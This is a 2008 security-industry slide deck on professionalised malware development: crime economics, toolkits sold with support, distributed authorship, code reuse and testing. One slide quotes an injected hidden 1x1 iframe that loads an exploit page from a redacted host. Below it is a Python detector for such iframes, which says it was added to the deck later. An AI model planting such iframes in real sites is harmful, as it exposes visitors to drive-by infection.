
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Professional Development Trends in Malware

Michael A. Davis, Chief Executive Officer

Savid Technologies, Inc.

http://www.savidtech.com


Agenda

» Who am I?

» State of the Union

» Development Trends

» Questions


About Savid

» Michael A. Davis - CEO

» Founded in 2003

» Chicago & DC Offices

» Think Tank of security professionals

» Diverse set of IT skill

» Unique, agile combination of expertise

» Cater to the special security needs of business

» We love what we do and will work hard to meet our clients' needs

Our focus is unique, high-end solutions. We do NOT provide “cookie-cutter” solutions because our clientele do not have “cookie-cutter” problems.


State of the Union

» “Protection” is in place…

– 98% use firewalls

– 97% of companies protect machines with antivirus software

– 79% use anti-spyware

– 61% use email monitoring software

» But it’s not enough…

– Cost of malware: $14.2B

– 80% of companies experienced 1 or more successful attacks, 30% had more than 10

– Worldwide, 32% of companies experience attacks involving business partners

– 43% of those were infections, while 27% were unauthorized access

– 75% of enterprises will be infected with malware that evaded traditional defenses

Sources: Computer Security Institute/FBI, 2006 Computer Crime and Security Survey; Computer Economics, 2006; ICSA Labs, 9th Annual Computer Virus Prevalence Survey; Cybertrust, Risky Business, September 2006; Gartner, Gartner’s Top Predictions for IT Organizations and Users, 2007 & Beyond, December 2006


The Problem - Continued

[Chart: vulnerabilities reported per year, y-axis 0 to 10,000]


Time to Patch


The Threat

» Highly organized crime. Their motive is Return on Investment.

» Fraud, identity theft and extortion have been going on for centuries. The Internet has made them exponentially profitable with minimal risk.

» Attacks are extremely sophisticated and one step ahead of defenses.


It’s a Business

"It’s very simple. We buy these products in Western countries with stolen credit cards. You don’t run any risk when purchasing these products."

Image Source: PandaSoftware at http://www.pandasoftware.com


The Tools

» Tools are being actively sold to automate criminal activity.

» These tools have manuals, updates, and even support.

» Prices range from $20 to $3,000

» Russia is a breeding ground for the development and distribution.


For Sale


Professional Interfaces

Image Source: PandaSoftware at http://www.pandasoftware.com


Partner Programs


Malicious Websites

<iframe src=http://***/ex.php border=0 width=1 height=1></iframe>
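A defender-side check for the hidden-iframe pattern shown on this slide, added here as an example and not part of the original deck: it parses page HTML with Python's standard html.parser and flags iframes that are sized 1x1 (or smaller) or hidden via inline style. The sample HTML is constructed; the `***` host is the slide's own redaction, kept as a placeholder.

```python
from html.parser import HTMLParser

# Constructed sample page: the slide's 1x1 iframe, a legitimate video embed,
# and a second iframe hidden with CSS instead of tiny dimensions.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src=http://***/ex.php border=0 width=1 height=1></iframe>
<iframe src="https://example.org/embed" width="640" height="360"></iframe>
<iframe src="http://***/other.php" style="display:none"></iframe>
</body></html>"""


def _px(value):
    """Parse a width/height attribute ('1', '1px') to an int; None if not a plain pixel count."""
    if value is None:
        return None
    v = value.strip().lower().rstrip("px")
    return int(v) if v.isdigit() else None


class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are invisible by size or hidden by inline style."""

    def __init__(self):
        super().__init__()
        self.suspicious = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # html.parser accepts unquoted values such as width=1
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = (a.get("style") or "").replace(" ", "").lower()
        tiny = (w is not None and w <= 1) or (h is not None and h <= 1)
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            self.suspicious.append({"src": a.get("src"), "width": w, "height": h,
                                    "reason": "tiny" if tiny else "hidden"})


def find_hidden_iframes(html):
    """Return a list of suspicious iframe records found in the given HTML."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    return parser.suspicious


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_HTML):
        print(hit)
```

Run over fetched page bodies or a web proxy's HTML captures, the hits are a cheap first-pass indicator for drive-by injection worth pairing with a lookup of the iframe's source host.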


Professional Development

» Money enables quality

» Teams of developers

» Funded by investors

– Must guarantee ROI


Open Source Development

» Different from traditional production

» Highly Distributed

» E-Mail as communication mechanism

» Various Tools

– Version Control

– Bug Tracking System – For Support

– Rudimentary Change Management

– No Project Plans

– Donated Resources/Time

– Contributors pick what they want to do


Multiple Contributors

» Virus/Trojan written by one author

» Initial malware written by single author

» Contributors join work on bug testing

» Most malware has 2-10 authors

» Other Contributors

– Host bug system

– Host testing forum

– Donate money


Feature Modifications

» No Project Plan

» Contributors work on what is “cool”

– Usually whatever is causing them pain

– E.g., P2P in response to botnet shutdowns

» Money

– Give priority to certain features

– Management Consoles are an example

» Malware Authors Create their own market

– Build frameworks that require customization


A Silver Bullet Doesn’t Exist


Module Reuse

» Mythical Man Month states that the silver bullet is Module Reuse

» Malware uses tons of Open Source Code

– OpenSSL

– Apache

– Pthreads

– Free Source Code

» This code has been tested and is high quality

» Malware frameworks are built upon it

– Variants are the problem, not new species


Quality Testing

» Version Control enables rolling back bad code or branches of code

» Follows Open Source “Build/Release” test framework

» New Releases are “Interrupt Driven”

– Only release new versions when the authors feel like it

» Authors hate to support their software

– Automatic update mechanisms

– Change Logs

– Documentation


What does this all mean?

» It is all about Return on Investment (ROI)

» Malware is staying longer on workstations

» Malware is taking longer to remove

– Multiple apps, reboots, etc.

» Malware is becoming more stealthy within the OS

» Malware infections are more directed and have larger impact


Conclusion

» Thank you

» Michael A. Davis, [email protected], (708) 532-2843

» Questions?